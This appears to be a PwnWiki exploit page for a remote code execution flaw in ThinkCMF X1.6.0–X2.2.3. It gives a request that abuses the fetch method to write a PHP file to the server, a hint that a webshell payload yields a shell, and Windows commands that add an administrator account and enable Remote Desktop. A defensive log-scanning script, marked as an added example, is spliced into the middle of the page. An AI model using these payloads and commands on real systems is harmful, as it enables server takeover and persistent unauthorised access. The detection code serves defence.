ThinkCMF X1.6.0-X2.2.3 framework arbitrary content inclusion vulnerability

From PwnWiki
Revision as of 15:54, 2 July 2021 by Kongxu (thinkcmf batch exploitation tool)

Affected versions:

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

Exploitation:

Calling the fetch method through the a parameter results in remote code execution:
?a=fetch&templateFile=public/index&prefix=&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
Request:
http://127.0.0.1/cmfx/?a=fetch&templateFile=public/index&prefix=&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
Then request:
http://127.0.0.1/cmfx/test.php
The PHPINFO output is then displayed. Changing the payload to a one-line webshell yields a shell.
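
A detection sketch for the request shape shown above, as an added example that is not part of the original page: it flags access-log lines where the a parameter selects fetch, and reports a distinct reason when content carries <php> or <?php markers, including double-encoded ones. The combined log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Code markers of the kind carried in the content parameter on this page
CODE_MARKER_RE = re.compile(r"<\s*php\s*>|<\?php|<\?=", re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so %253Cphp%253E is still recognised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return None for an unremarkable line, otherwise a short reason."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group("target")).query
    params = {key.lower(): [decode_fully(v) for v in values]
              for key, values in parse_qs(query, keep_blank_values=True).items()}
    if "fetch" not in (a.lower() for a in params.get("a", [])):
        return None
    if any(CODE_MARKER_RE.search(c) for c in params.get("content", [])):
        return "a=fetch with code markers in content"
    if "content" in params or "templatefile" in params:
        return "a=fetch with client-supplied content/templateFile"
    return "a=fetch requested directly"

def scan(lines):
    """Return (line_number, reason) for every flagged line."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := classify(line))]

# Constructed sample log lines (addresses, paths and payload text are placeholders)
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Jul/2021:15:54:01 +0000] "GET /cmfx/?a=fetch&templateFile=public/index&prefix=&content=%3Cphp%3EPLACEHOLDER%3C%2Fphp%3E HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Jul/2021:15:54:09 +0000] "GET /cmfx/?a=fetch&content=%253Cphp%253EPLACEHOLDER%253C%252Fphp%253E HTTP/1.1" 200 512',
    '203.0.113.5 - - [02/Jul/2021:15:55:12 +0000] "GET /cmfx/index.php?g=portal&m=article&a=index&id=3 HTTP/1.1" 200 9120',
    '198.51.100.9 - - [02/Jul/2021:15:56:40 +0000] "GET /cmfx/?a=fetch&templateFile=public/index HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

Parameters sent in a request body do not appear in access logs, so this check covers query strings only.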

Create a new user, add it to the administrators group, and enable Remote Desktop connections (on Windows):

net user test test /add
net localgroup administrators test /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

ThinkCMF batch exploitation tool

ThinkCMF batch exploitation tool